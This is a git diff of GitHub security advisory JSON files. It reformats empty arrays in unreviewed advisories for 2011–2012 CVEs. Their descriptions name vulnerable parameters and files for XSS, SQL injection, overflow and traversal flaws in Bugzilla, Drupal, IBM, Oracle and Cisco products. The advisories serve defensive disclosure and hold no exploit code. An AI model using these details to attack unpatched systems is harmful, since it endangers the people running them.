a/advisories/unreviewed/2022/05/GHSA-v4rc-394x-wh8w/GHSA-v4rc-394x-wh8w.json +++ b/advisories/unreviewed/2022/05/GHSA-v4rc-394x-wh8w/GHSA-v4rc-394x-wh8w.json @@ -7,12 +7,8 @@ "CVE-2012-3981" ], "details": "Auth/Verify/LDAP.pm in Bugzilla 2.x and 3.x before 3.6.11, 3.7.x and 4.0.x before 4.0.8, 4.1.x and 4.2.x before 4.2.3, and 4.3.x before 4.3.3 does not restrict the characters in a username, which might allow remote attackers to inject data into an LDAP directory via a crafted login attempt.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-v58p-m8w8-cxg3/GHSA-v58p-m8w8-cxg3.json b/advisories/unreviewed/2022/05/GHSA-v58p-m8w8-cxg3/GHSA-v58p-m8w8-cxg3.json index 7e1cdde9769..7a34e88e321 100644 --- a/advisories/unreviewed/2022/05/GHSA-v58p-m8w8-cxg3/GHSA-v58p-m8w8-cxg3.json +++ b/advisories/unreviewed/2022/05/GHSA-v58p-m8w8-cxg3/GHSA-v58p-m8w8-cxg3.json @@ -7,12 +7,8 @@ "CVE-2012-2912" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the LeagueManager plugin 3.7 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) group parameter in the show-league page or (2) season parameter in the team page to wp-admin/admin.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v5cp-96cw-fp58/GHSA-v5cp-96cw-fp58.json b/advisories/unreviewed/2022/05/GHSA-v5cp-96cw-fp58/GHSA-v5cp-96cw-fp58.json index 08b166eb58d..ce86afb3474 100644 --- a/advisories/unreviewed/2022/05/GHSA-v5cp-96cw-fp58/GHSA-v5cp-96cw-fp58.json +++ b/advisories/unreviewed/2022/05/GHSA-v5cp-96cw-fp58/GHSA-v5cp-96cw-fp58.json @@ -7,12 +7,8 @@ "CVE-2012-3315" ], "details": "The Java servlets in the management console in IBM Tivoli Federated Identity Manager (TFIM) through 6.2.2 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) before 6.2.2 do not require authentication for all resource downloads, which allows remote attackers to bypass intended J2EE security constraints, and obtain sensitive information related to (1) federation metadata or (2) a web plugin configuration template, via a crafted request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v77w-qwxx-c96p/GHSA-v77w-qwxx-c96p.json b/advisories/unreviewed/2022/05/GHSA-v77w-qwxx-c96p/GHSA-v77w-qwxx-c96p.json index af547733265..b7c13ac9513 100644 --- a/advisories/unreviewed/2022/05/GHSA-v77w-qwxx-c96p/GHSA-v77w-qwxx-c96p.json +++ b/advisories/unreviewed/2022/05/GHSA-v77w-qwxx-c96p/GHSA-v77w-qwxx-c96p.json @@ -7,12 +7,8 @@ "CVE-2012-3326" ], "details": "Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 7.5, as used in SmartCloud Control Desk, Tivoli Asset Management for IT, Tivoli Service Request Manager, Maximo Service Desk, and Change and Configuration Management Database (CCMDB), allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v7xj-cjg7-4rfm/GHSA-v7xj-cjg7-4rfm.json b/advisories/unreviewed/2022/05/GHSA-v7xj-cjg7-4rfm/GHSA-v7xj-cjg7-4rfm.json index b5154a69b72..b0a3878fd4e 100644 --- a/advisories/unreviewed/2022/05/GHSA-v7xj-cjg7-4rfm/GHSA-v7xj-cjg7-4rfm.json +++ b/advisories/unreviewed/2022/05/GHSA-v7xj-cjg7-4rfm/GHSA-v7xj-cjg7-4rfm.json @@ -7,12 +7,8 @@ "CVE-2012-2076" ], "details": "Cross-site scripting (XSS) vulnerability in the administration forms in the ShareThis module 7.x-2.x before 7.x-2.3 for Drupal allows remote authenticated users with administer sharethis permissions to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-v82c-prq9-mg8q/GHSA-v82c-prq9-mg8q.json b/advisories/unreviewed/2022/05/GHSA-v82c-prq9-mg8q/GHSA-v82c-prq9-mg8q.json index 03d1dd24cd4..21b758eaf88 100644 --- a/advisories/unreviewed/2022/05/GHSA-v82c-prq9-mg8q/GHSA-v82c-prq9-mg8q.json +++ b/advisories/unreviewed/2022/05/GHSA-v82c-prq9-mg8q/GHSA-v82c-prq9-mg8q.json @@ -7,12 +7,8 @@ "CVE-2012-0729" ], "details": "Unrestricted file upload vulnerability in IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 allows remote authenticated users to execute arbitrary ASP.NET code by uploading a .aspx file, and then accessing it via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-v89m-6q95-4f46/GHSA-v89m-6q95-4f46.json b/advisories/unreviewed/2022/05/GHSA-v89m-6q95-4f46/GHSA-v89m-6q95-4f46.json index 1f5de708350..6845363e214 100644 --- a/advisories/unreviewed/2022/05/GHSA-v89m-6q95-4f46/GHSA-v89m-6q95-4f46.json +++ b/advisories/unreviewed/2022/05/GHSA-v89m-6q95-4f46/GHSA-v89m-6q95-4f46.json @@ -7,12 +7,8 @@ "CVE-2012-2203" ], "details": "IBM Global Security Kit (aka GSKit) before 8.0.14.22, as used in IBM Rational Directory Server, IBM Tivoli Directory Server, and other products, uses the PKCS #12 file format for certificate objects without enforcing file integrity, which makes it easier for remote attackers to spoof SSL servers via vectors involving insertion of an arbitrary root Certification Authority (CA) certificate.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-v943-qg78-x777/GHSA-v943-qg78-x777.json b/advisories/unreviewed/2022/05/GHSA-v943-qg78-x777/GHSA-v943-qg78-x777.json index 7b8d8826d69..d954f5ebd86 100644 --- a/advisories/unreviewed/2022/05/GHSA-v943-qg78-x777/GHSA-v943-qg78-x777.json +++ b/advisories/unreviewed/2022/05/GHSA-v943-qg78-x777/GHSA-v943-qg78-x777.json @@ -7,12 +7,8 @@ "CVE-2012-1648" ], "details": "Cross-site scripting (XSS) vulnerability in the Cool Aid module before 6.x-1.9 for Drupal allows remote authenticated users with the administer coolaid permission to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vc5v-r5xx-gwx3/GHSA-vc5v-r5xx-gwx3.json b/advisories/unreviewed/2022/05/GHSA-vc5v-r5xx-gwx3/GHSA-vc5v-r5xx-gwx3.json index 135db9268c2..e480be716a4 100644 --- a/advisories/unreviewed/2022/05/GHSA-vc5v-r5xx-gwx3/GHSA-vc5v-r5xx-gwx3.json +++ b/advisories/unreviewed/2022/05/GHSA-vc5v-r5xx-gwx3/GHSA-vc5v-r5xx-gwx3.json @@ -7,12 +7,8 @@ "CVE-2012-1789" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Kongreg8 1.7.3 allow remote attackers to inject arbitrary web script or HTML via the (1) surname or (2) firstname parameters to modules/members/addmember.php; or (3) groupdescription or (4) groupname parameters to modules/groups/addgroupform.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vcm3-7qxc-p6vg/GHSA-vcm3-7qxc-p6vg.json b/advisories/unreviewed/2022/05/GHSA-vcm3-7qxc-p6vg/GHSA-vcm3-7qxc-p6vg.json index 47868537c4a..235b74ae531 100644 --- a/advisories/unreviewed/2022/05/GHSA-vcm3-7qxc-p6vg/GHSA-vcm3-7qxc-p6vg.json +++ b/advisories/unreviewed/2022/05/GHSA-vcm3-7qxc-p6vg/GHSA-vcm3-7qxc-p6vg.json @@ -7,12 +7,8 @@ "CVE-2012-2413" ], "details": "Cross-site scripting (XSS) vulnerability in the ja_purity template for Joomla! 1.5.26 and earlier allows remote attackers to inject arbitrary web script or HTML via the Mod* cookie parameter to html/modules.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vf2p-vgw8-9hvq/GHSA-vf2p-vgw8-9hvq.json b/advisories/unreviewed/2022/05/GHSA-vf2p-vgw8-9hvq/GHSA-vf2p-vgw8-9hvq.json index 21b21f02c3a..f145d3286f9 100644 --- a/advisories/unreviewed/2022/05/GHSA-vf2p-vgw8-9hvq/GHSA-vf2p-vgw8-9hvq.json +++ b/advisories/unreviewed/2022/05/GHSA-vf2p-vgw8-9hvq/GHSA-vf2p-vgw8-9hvq.json @@ -7,12 +7,8 @@ "CVE-2012-0982" ], "details": "SQL injection vulnerability in search.php in Vastal I-Tech Agent Zone (aka The Real Estate Script) allows remote attackers to execute arbitrary SQL commands via the price_from parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vfw5-rhwh-5h4p/GHSA-vfw5-rhwh-5h4p.json b/advisories/unreviewed/2022/05/GHSA-vfw5-rhwh-5h4p/GHSA-vfw5-rhwh-5h4p.json index 787d167fdf9..5f54d0af2ab 100644 --- a/advisories/unreviewed/2022/05/GHSA-vfw5-rhwh-5h4p/GHSA-vfw5-rhwh-5h4p.json +++ b/advisories/unreviewed/2022/05/GHSA-vfw5-rhwh-5h4p/GHSA-vfw5-rhwh-5h4p.json @@ -7,12 +7,8 @@ "CVE-2012-0897" ], "details": "Stack-based buffer overflow in the JPEG2000 plugin in IrfanView PlugIns before 4.33 allows remote attackers to execute arbitrary code via a JPEG2000 (JP2) file with a crafted Quantization Default (QCD) marker segment.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vghj-22mx-4xm6/GHSA-vghj-22mx-4xm6.json b/advisories/unreviewed/2022/05/GHSA-vghj-22mx-4xm6/GHSA-vghj-22mx-4xm6.json index 931e7adcf4b..6bcbbdf17f5 100644 --- a/advisories/unreviewed/2022/05/GHSA-vghj-22mx-4xm6/GHSA-vghj-22mx-4xm6.json +++ b/advisories/unreviewed/2022/05/GHSA-vghj-22mx-4xm6/GHSA-vghj-22mx-4xm6.json @@ -7,12 +7,8 @@ "CVE-2012-2407" ], "details": "Buffer overflow in RealNetworks RealPlayer before 15.0.6.14, RealPlayer SP 1.0 through 1.1.5, and Mac RealPlayer before 12.0.1.1750 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted AAC file that is not properly handled during stream-data unpacking.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vgj5-g5f9-3rph/GHSA-vgj5-g5f9-3rph.json b/advisories/unreviewed/2022/05/GHSA-vgj5-g5f9-3rph/GHSA-vgj5-g5f9-3rph.json index 4306fd87e2d..179e7efa384 100644 --- a/advisories/unreviewed/2022/05/GHSA-vgj5-g5f9-3rph/GHSA-vgj5-g5f9-3rph.json +++ b/advisories/unreviewed/2022/05/GHSA-vgj5-g5f9-3rph/GHSA-vgj5-g5f9-3rph.json @@ -7,12 +7,8 @@ "CVE-2012-1197" ], "details": "Integer overflow in the IDE_ACDStd.apl module for ACDSee 14.1 Build 137 allows remote attackers to execute arbitrary code via crafted \"image dimension values\" in a BMP file, which triggers a heap-based buffer overflow.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vh54-2w7r-mpgf/GHSA-vh54-2w7r-mpgf.json b/advisories/unreviewed/2022/05/GHSA-vh54-2w7r-mpgf/GHSA-vh54-2w7r-mpgf.json index 0141855cb9b..6e2757361e9 100644 --- a/advisories/unreviewed/2022/05/GHSA-vh54-2w7r-mpgf/GHSA-vh54-2w7r-mpgf.json +++ b/advisories/unreviewed/2022/05/GHSA-vh54-2w7r-mpgf/GHSA-vh54-2w7r-mpgf.json @@ -7,12 +7,8 @@ "CVE-2012-0938" ], "details": "Multiple SQL injection vulnerabilities in TestLink 1.9.3, 1.8.5b, and earlier allow remote authenticated users with certain permissions to execute arbitrary SQL commands via the root_node parameter in the display_children function to (1) getrequirementnodes.php or (2) gettprojectnodes.php in lib/ajax/; the (3) cfield_id parameter in an edit action to lib/cfields/cfieldsEdit.php; the (4) id parameter in an edit action or (5) plan_id parameter in a create action to lib/plan/planMilestonesEdit.php; or the req_spec_id parameter to (6) reqImport.php or (7) in a create action to reqEdit.php in lib/requirements/. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vhrq-rr5q-mpp9/GHSA-vhrq-rr5q-mpp9.json b/advisories/unreviewed/2022/05/GHSA-vhrq-rr5q-mpp9/GHSA-vhrq-rr5q-mpp9.json index 65c5371c0a1..b7929e83739 100644 --- a/advisories/unreviewed/2022/05/GHSA-vhrq-rr5q-mpp9/GHSA-vhrq-rr5q-mpp9.json +++ b/advisories/unreviewed/2022/05/GHSA-vhrq-rr5q-mpp9/GHSA-vhrq-rr5q-mpp9.json @@ -7,12 +7,8 @@ "CVE-2012-2105" ], "details": "Multiple SQL injection vulnerabilities in login.php in Timesheet Next Gen 1.5.2 allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password parameters.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vjg8-fgcj-ch2g/GHSA-vjg8-fgcj-ch2g.json b/advisories/unreviewed/2022/05/GHSA-vjg8-fgcj-ch2g/GHSA-vjg8-fgcj-ch2g.json index 57298f231e0..a864aff8730 100644 --- a/advisories/unreviewed/2022/05/GHSA-vjg8-fgcj-ch2g/GHSA-vjg8-fgcj-ch2g.json +++ b/advisories/unreviewed/2022/05/GHSA-vjg8-fgcj-ch2g/GHSA-vjg8-fgcj-ch2g.json @@ -7,12 +7,8 @@ "CVE-2012-1748" ], "details": "Unspecified vulnerability in the PeopleSoft Enterprise HRMS component in Oracle PeopleSoft Products 9.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Candidate Gateway, a different vulnerability than CVE-2012-0562.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vjjr-whj3-xg6q/GHSA-vjjr-whj3-xg6q.json b/advisories/unreviewed/2022/05/GHSA-vjjr-whj3-xg6q/GHSA-vjjr-whj3-xg6q.json index 9d6c90ce80b..edd94b4bf2c 100644 --- a/advisories/unreviewed/2022/05/GHSA-vjjr-whj3-xg6q/GHSA-vjjr-whj3-xg6q.json +++ b/advisories/unreviewed/2022/05/GHSA-vjjr-whj3-xg6q/GHSA-vjjr-whj3-xg6q.json @@ -7,12 +7,8 @@ "CVE-2012-3306" ], "details": "IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.45, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1, when multi-domain support is configured, does not purge password data from the authentication cache, which has unspecified impact and remote attack vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vjq5-pjhp-xqm9/GHSA-vjq5-pjhp-xqm9.json b/advisories/unreviewed/2022/05/GHSA-vjq5-pjhp-xqm9/GHSA-vjq5-pjhp-xqm9.json index 097efa628ba..6bce55a2aab 100644 --- a/advisories/unreviewed/2022/05/GHSA-vjq5-pjhp-xqm9/GHSA-vjq5-pjhp-xqm9.json +++ b/advisories/unreviewed/2022/05/GHSA-vjq5-pjhp-xqm9/GHSA-vjq5-pjhp-xqm9.json @@ -7,12 +7,8 @@ "CVE-2012-1912" ], "details": "Cross-site scripting (XSS) vulnerability in preferences.php in PHP Address Book 7.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the from parameter. NOTE: the index.php vector is already covered by CVE-2008-2566.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vjw3-r535-w8h3/GHSA-vjw3-r535-w8h3.json b/advisories/unreviewed/2022/05/GHSA-vjw3-r535-w8h3/GHSA-vjw3-r535-w8h3.json index 5c345382d7a..e3d9a89e223 100644 --- a/advisories/unreviewed/2022/05/GHSA-vjw3-r535-w8h3/GHSA-vjw3-r535-w8h3.json +++ b/advisories/unreviewed/2022/05/GHSA-vjw3-r535-w8h3/GHSA-vjw3-r535-w8h3.json @@ -7,12 +7,8 @@ "CVE-2011-4824" ], "details": "SQL injection vulnerability in auth_login.php in Cacti before 0.8.7h allows remote attackers to execute arbitrary SQL commands via the login_username parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vm46-gfgh-2xmw/GHSA-vm46-gfgh-2xmw.json b/advisories/unreviewed/2022/05/GHSA-vm46-gfgh-2xmw/GHSA-vm46-gfgh-2xmw.json index c74884e0ffe..009cbe4a700 100644 --- a/advisories/unreviewed/2022/05/GHSA-vm46-gfgh-2xmw/GHSA-vm46-gfgh-2xmw.json +++ b/advisories/unreviewed/2022/05/GHSA-vm46-gfgh-2xmw/GHSA-vm46-gfgh-2xmw.json @@ -7,12 +7,8 @@ "CVE-2012-1759" ], "details": "Unspecified vulnerability in the Oracle AutoVue component in Oracle Supply Chain Products Suite 20.0.2 and 20.1 allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-1758.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vmf7-g928-8j2x/GHSA-vmf7-g928-8j2x.json b/advisories/unreviewed/2022/05/GHSA-vmf7-g928-8j2x/GHSA-vmf7-g928-8j2x.json index 7688c9c0b9e..eaa1040c906 100644 --- a/advisories/unreviewed/2022/05/GHSA-vmf7-g928-8j2x/GHSA-vmf7-g928-8j2x.json +++ b/advisories/unreviewed/2022/05/GHSA-vmf7-g928-8j2x/GHSA-vmf7-g928-8j2x.json @@ -7,12 +7,8 @@ "CVE-2012-3919" ], "details": "The Cisco Application Control Engine (ACE) module 3.0 for Cisco Catalyst switches and Cisco routers does not properly monitor Load Balancer (LB) queues, which allows remote attackers to cause a denial of service (incorrect memory access and module reboot) via application traffic, aka Bug ID CSCtw70879.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vmg6-34cj-3c66/GHSA-vmg6-34cj-3c66.json b/advisories/unreviewed/2022/05/GHSA-vmg6-34cj-3c66/GHSA-vmg6-34cj-3c66.json index 739912be77b..018c13349e3 100644 --- a/advisories/unreviewed/2022/05/GHSA-vmg6-34cj-3c66/GHSA-vmg6-34cj-3c66.json +++ b/advisories/unreviewed/2022/05/GHSA-vmg6-34cj-3c66/GHSA-vmg6-34cj-3c66.json @@ -7,12 +7,8 @@ "CVE-2012-2177" ], "details": "Cross-site scripting (XSS) vulnerability in IBM Cognos Business Intelligence (BI) 8.4.1 before IF1, 10.1 before IF2, 10.1.1 before IF2, and 10.2 before IF1 allows user-assisted remote attackers to inject arbitrary web script or HTML via vectors related to the search feature.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vp5v-5fhg-v965/GHSA-vp5v-5fhg-v965.json b/advisories/unreviewed/2022/05/GHSA-vp5v-5fhg-v965/GHSA-vp5v-5fhg-v965.json index 2a3ad57ba2c..dd7f15b70b6 100644 --- a/advisories/unreviewed/2022/05/GHSA-vp5v-5fhg-v965/GHSA-vp5v-5fhg-v965.json +++ b/advisories/unreviewed/2022/05/GHSA-vp5v-5fhg-v965/GHSA-vp5v-5fhg-v965.json @@ -7,12 +7,8 @@ "CVE-2012-3843" ], "details": "Cross-site scripting (XSS) vulnerability in the registration page in e107, probably 1.0.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vpfx-3mh7-rgj3/GHSA-vpfx-3mh7-rgj3.json b/advisories/unreviewed/2022/05/GHSA-vpfx-3mh7-rgj3/GHSA-vpfx-3mh7-rgj3.json index 56de4db1ae9..250223dc2e2 100644 --- a/advisories/unreviewed/2022/05/GHSA-vpfx-3mh7-rgj3/GHSA-vpfx-3mh7-rgj3.json +++ b/advisories/unreviewed/2022/05/GHSA-vpfx-3mh7-rgj3/GHSA-vpfx-3mh7-rgj3.json @@ -7,12 +7,8 @@ "CVE-2012-1750" ], "details": "Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to mailx.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vpvc-pq35-vhfw/GHSA-vpvc-pq35-vhfw.json b/advisories/unreviewed/2022/05/GHSA-vpvc-pq35-vhfw/GHSA-vpvc-pq35-vhfw.json index 49eda1c3be8..6055625dfb3 100644 --- a/advisories/unreviewed/2022/05/GHSA-vpvc-pq35-vhfw/GHSA-vpvc-pq35-vhfw.json +++ b/advisories/unreviewed/2022/05/GHSA-vpvc-pq35-vhfw/GHSA-vpvc-pq35-vhfw.json @@ -7,12 +7,8 @@ "CVE-2012-2215" ], "details": "Directory traversal vulnerability in the Preboot Service in Novell ZENworks Configuration Management (ZCM) 11.1 and 11.1a allows remote attackers to read arbitrary files via an opcode 0x21 request.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vrhx-ff8q-5x4m/GHSA-vrhx-ff8q-5x4m.json b/advisories/unreviewed/2022/05/GHSA-vrhx-ff8q-5x4m/GHSA-vrhx-ff8q-5x4m.json index 1a59723c953..95e65ad3efd 100644 --- a/advisories/unreviewed/2022/05/GHSA-vrhx-ff8q-5x4m/GHSA-vrhx-ff8q-5x4m.json +++ b/advisories/unreviewed/2022/05/GHSA-vrhx-ff8q-5x4m/GHSA-vrhx-ff8q-5x4m.json @@ -7,12 +7,8 @@ "CVE-2012-3296" ], "details": "Cross-site scripting (XSS) vulnerability in the Help link in the login panel in IBM Power Hardware Management Console (HMC) 7R7.1.0 before SP4, 7R7.2.0 before SP2, and 7R7.3.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vrv5-gmvc-m6qf/GHSA-vrv5-gmvc-m6qf.json b/advisories/unreviewed/2022/05/GHSA-vrv5-gmvc-m6qf/GHSA-vrv5-gmvc-m6qf.json index f014d28c4ce..ff7f8c61cfc 100644 --- a/advisories/unreviewed/2022/05/GHSA-vrv5-gmvc-m6qf/GHSA-vrv5-gmvc-m6qf.json +++ b/advisories/unreviewed/2022/05/GHSA-vrv5-gmvc-m6qf/GHSA-vrv5-gmvc-m6qf.json @@ -7,12 +7,8 @@ "CVE-2012-0919" ], "details": "Cross-site scripting (XSS) vulnerability in Hitachi IT Operations Director 02-50-01 through 02-50-07, 03-00 through 03-00-04, and possibly other versions before 03-00-06, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vv6f-5rwc-v9p3/GHSA-vv6f-5rwc-v9p3.json b/advisories/unreviewed/2022/05/GHSA-vv6f-5rwc-v9p3/GHSA-vv6f-5rwc-v9p3.json index 8184c6d4135..d8a04ecf516 100644 --- a/advisories/unreviewed/2022/05/GHSA-vv6f-5rwc-v9p3/GHSA-vv6f-5rwc-v9p3.json +++ b/advisories/unreviewed/2022/05/GHSA-vv6f-5rwc-v9p3/GHSA-vv6f-5rwc-v9p3.json @@ -7,12 +7,8 @@ "CVE-2012-3079" ], "details": "Cisco IOS 12.2 allows remote attackers to cause a denial of service (CPU consumption) by establishing many IPv6 neighbors, aka Bug ID CSCtn78957.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vwpr-mjg8-vhm9/GHSA-vwpr-mjg8-vhm9.json b/advisories/unreviewed/2022/05/GHSA-vwpr-mjg8-vhm9/GHSA-vwpr-mjg8-vhm9.json index 4531b502bbf..04dfb2361f8 100644 --- a/advisories/unreviewed/2022/05/GHSA-vwpr-mjg8-vhm9/GHSA-vwpr-mjg8-vhm9.json +++ b/advisories/unreviewed/2022/05/GHSA-vwpr-mjg8-vhm9/GHSA-vwpr-mjg8-vhm9.json @@ -7,12 +7,8 @@ "CVE-2012-2070" ], "details": "Cross-site scripting (XSS) vulnerability in the MultiBlock module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.1 for Drupal allows remote authenticated users with the administer blocks permission to inject arbitrary web script or HTML via the block title.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vwxq-92pg-vg79/GHSA-vwxq-92pg-vg79.json b/advisories/unreviewed/2022/05/GHSA-vwxq-92pg-vg79/GHSA-vwxq-92pg-vg79.json index 98c454de3fc..23a81b4e4af 100644 --- a/advisories/unreviewed/2022/05/GHSA-vwxq-92pg-vg79/GHSA-vwxq-92pg-vg79.json +++ b/advisories/unreviewed/2022/05/GHSA-vwxq-92pg-vg79/GHSA-vwxq-92pg-vg79.json @@ -7,12 +7,8 @@ "CVE-2011-5199" ], "details": "Cross-site scripting (XSS) vulnerability in sign.php in tinyguestbook allows remote attackers to inject arbitrary web script or HTML via the msg parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-vx34-5jq7-vqc8/GHSA-vx34-5jq7-vqc8.json b/advisories/unreviewed/2022/05/GHSA-vx34-5jq7-vqc8/GHSA-vx34-5jq7-vqc8.json index a43652c4644..5ca04918aa3 100644 --- a/advisories/unreviewed/2022/05/GHSA-vx34-5jq7-vqc8/GHSA-vx34-5jq7-vqc8.json +++ b/advisories/unreviewed/2022/05/GHSA-vx34-5jq7-vqc8/GHSA-vx34-5jq7-vqc8.json @@ -7,12 +7,8 @@ "CVE-2012-3497" ], "details": "(1) TMEMC_SAVE_GET_CLIENT_WEIGHT, (2) TMEMC_SAVE_GET_CLIENT_CAP, (3) TMEMC_SAVE_GET_CLIENT_FLAGS and (4) TMEMC_SAVE_END in the Transcendent Memory (TMEM) in Xen 4.0, 4.1, and 4.2 allow local guest OS users to cause a denial of service (NULL pointer dereference or memory corruption and host crash) or possibly have other unspecified impacts via a NULL client id.", - 